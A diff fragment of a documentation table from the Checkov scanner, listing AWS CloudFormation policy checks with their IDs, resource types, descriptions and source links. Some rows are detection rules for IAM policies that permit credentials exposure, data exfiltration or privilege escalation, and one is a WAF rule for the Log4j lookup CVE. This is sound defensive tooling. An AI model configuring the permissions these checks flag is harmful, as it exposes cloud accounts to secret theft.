-|  91 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener     | Ensure that Load Balancer Listener is using at least TLS v1.2                                                                                                                                            | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py)                                                                               |
-|  92 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup       | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py)                                                                                   |
-|  93 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup      | Ensure Redshift uses SSL                                                                                                                                                                                 | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py)                                                                                         |
-|  94 | CKV_AWS_107 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  95 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  96 | CKV_AWS_107 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  97 | CKV_AWS_107 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  98 | CKV_AWS_107 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  99 | CKV_AWS_108 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 100 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 101 | CKV_AWS_108 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 102 | CKV_AWS_108 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 103 | CKV_AWS_108 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 104 | CKV_AWS_109 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 105 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 106 | CKV_AWS_109 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 107 | CKV_AWS_109 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 108 | CKV_AWS_109 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 109 | CKV_AWS_110 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 110 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 111 | CKV_AWS_110 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 112 | CKV_AWS_110 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 113 | CKV_AWS_110 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 114 | CKV_AWS_111 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 115 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 116 | CKV_AWS_111 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 117 | CKV_AWS_111 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 118 | CKV_AWS_111 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 119 | CKV_AWS_115 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                         |
-| 120 | CKV_AWS_115 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                         |
-| 121 | CKV_AWS_116 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                         |
-| 122 | CKV_AWS_116 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                         |
-| 123 | CKV_AWS_117 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                         |
-| 124 | CKV_AWS_117 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                         |
-| 125 | CKV_AWS_118 | resource | AWS::RDS::DBInstance                      | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                             |
-| 126 | CKV_AWS_119 | resource | AWS::DynamoDB::Table                      | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                 |
-| 127 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage                    | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                     |
-| 128 | CKV_AWS_120 | resource | AWS::Serverless::Api                      | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                     |
-| 129 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService              | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                 |
-| 130 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py)                                                                           |
-| 131 | CKV_AWS_136 | resource | AWS::ECR::Repository                      | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                   |
-| 132 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret               | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                       |
-| 133 | CKV_AWS_154 | resource | AWS::Redshift::Cluster                    | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                               |
-| 134 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace                | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                       |
-| 135 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace                | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                       |
-| 136 | CKV_AWS_157 | resource | AWS::RDS::DBInstance                      | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py)                                                                             |
-| 137 | CKV_AWS_158 | resource | AWS::Logs::LogGroup                       | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                               |
-| 138 | CKV_AWS_160 | resource | AWS::Timestream::Database                 | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                               |
-| 139 | CKV_AWS_161 | resource | AWS::RDS::DBInstance                      | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py)                                                                       |
-| 140 | CKV_AWS_162 | resource | AWS::RDS::DBCluster                       | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                         |
-| 141 | CKV_AWS_163 | resource | AWS::ECR::Repository                      | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py)                                                                               |
-| 142 | CKV_AWS_164 | resource | AWS::Transfer::Server                     | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py)                                                                   |
-| 143 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable                | Ensure DynamoDB global table point in time recovery (backup) is enabled                                                                                                                                  | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py)                                                         |
-| 144 | CKV_AWS_166 | resource | AWS::Backup::BackupVault                  | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py)                                                                       |
-| 145 | CKV_AWS_170 | resource | AWS::QLDB::Ledger                         | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                             |
-| 146 | CKV_AWS_172 | resource | AWS::QLDB::Ledger                         | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                       |
-| 147 | CKV_AWS_173 | resource | AWS::Lambda::Function                     | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                         |
-| 148 | CKV_AWS_173 | resource | AWS::Serverless::Function                 | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                         |
-| 149 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution             | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py)                                                                                 |
-| 150 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL                        | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py)                                                                           |
-| 151 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync has Logging enabled                                                                                                                                                                       | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py)                                                                                   |
-| 152 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                     |
-| 153 | CKV_AWS_195 | resource | AWS::Glue::Crawler                        | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
-| 154 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint                    | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
-| 155 | CKV_AWS_195 | resource | AWS::Glue::Job                            | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
-| 156 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker                     | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py)                                                                       |
-| 157 | CKV_AWS_258 | resource | AWS::Lambda::Url                          | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                     |
-| 158 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                           |
-| 159 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                           |
-| 160 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                 |
-| 161 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain            | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                 |
-| 162 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster                     | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py)                                                                       |
-| 163 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster                   | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                     |
-| 164 | CKV_AWS_363 | resource | AWS::Lambda::Function                     | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                 |
-| 165 | CKV_AWS_363 | resource | AWS::Serverless::Function                 | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                 |
-| 166 | CKV_AWS_364 | resource | AWS::Lambda::Permission                   | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py)                                                                 |
-| 167 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync is protected by WAF                                                                                                                                                                       | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml)                                                                 |
+|  70 | CKV_AWS_80  | resource | AWS::MSK::Cluster                         | Ensure MSK Cluster logging is enabled                                                                                                                                                                    | Cloudformation | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py)                                                                             |
+|  71 | CKV_AWS_81  | resource | AWS::MSK::Cluster                         | Ensure MSK Cluster encryption in rest and transit is enabled                                                                                                                                             | Cloudformation | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py)                                                                       |
+|  72 | CKV_AWS_82  | resource | AWS::Athena::WorkGroup                    | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                       |
+|  73 | CKV_AWS_83  | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                 |
+|  74 | CKV_AWS_84  | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                           |
+|  75 | CKV_AWS_84  | resource | AWS::OpenSearchService::Domain            | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                           |
+|  76 | CKV_AWS_85  | resource | AWS::DocDB::DBCluster                     | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py)                                                                                       |
+|  77 | CKV_AWS_86  | resource | AWS::CloudFront::Distribution             | Ensure CloudFront Distribution has Access Logging enabled                                                                                                                                                | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py)                                                     |
+|  78 | CKV_AWS_87  | resource | AWS::Redshift::Cluster                    | Redshift cluster should not be publicly accessible                                                                                                                                                       | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py)                                             |
+|  79 | CKV_AWS_88  | resource | AWS::EC2::Instance                        | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                         |
+|  80 | CKV_AWS_88  | resource | AWS::EC2::LaunchTemplate                  | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                         |
+|  81 | CKV_AWS_89  | resource | AWS::DMS::ReplicationInstance             | DMS replication instance should not be publicly accessible                                                                                                                                               | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                               |
+|  82 | CKV_AWS_90  | resource | AWS::DocDB::DBClusterParameterGroup       | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py)                                                                                               |
+|  83 | CKV_AWS_91  | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py)                                                                                 |
+|  84 | CKV_AWS_92  | resource | AWS::ElasticLoadBalancing::LoadBalancer   | Ensure the ELB has access logging enabled                                                                                                                                                                | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py)                                                                                     |
+|  85 | CKV_AWS_94  | resource | AWS::Glue::DataCatalogEncryptionSettings  | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py)                                                             |
+|  86 | CKV_AWS_95  | resource | AWS::ApiGatewayV2::Stage                  | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                             |
+|  87 | CKV_AWS_95  | resource | AWS::Serverless::HttpApi                  | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                             |
+|  88 | CKV_AWS_96  | resource | AWS::RDS::DBCluster                       | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py)                                                                               |
